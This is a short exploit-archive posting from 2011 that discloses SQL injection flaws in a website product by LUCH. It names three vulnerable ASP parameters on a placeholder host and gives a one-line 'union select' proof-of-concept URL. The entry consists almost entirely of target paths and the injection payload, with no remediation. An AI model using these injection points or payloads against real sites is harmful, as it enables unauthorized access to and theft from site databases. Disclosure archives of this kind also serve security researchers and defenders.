[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Luch Web Designer Multiple SQL Injection Vulnerabilities
# Published : 2011-03-10
# Author : p0pc0rn
# Previous Title : Bacula-web 1.3.x - 5.0.3 Multiple Remote Vulnerabilities
# Next Title : EggAvatar for vBulletin 3.8.x SQL Injection Vulnerability
Title : Web Designed by LUCH Vulnerable to SQL Injection
Vendor : http://www.luch.co.il
Found by: p0pc0rn
SQL
---
http://site.com/page.asp?id=[SQL]
http://site.com/cat.asp?catid=[SQL]
http://site.com/catin.asp?productid=[SQL]
POC
---
http://site.com/page.asp?id=23 union select 1 from test.a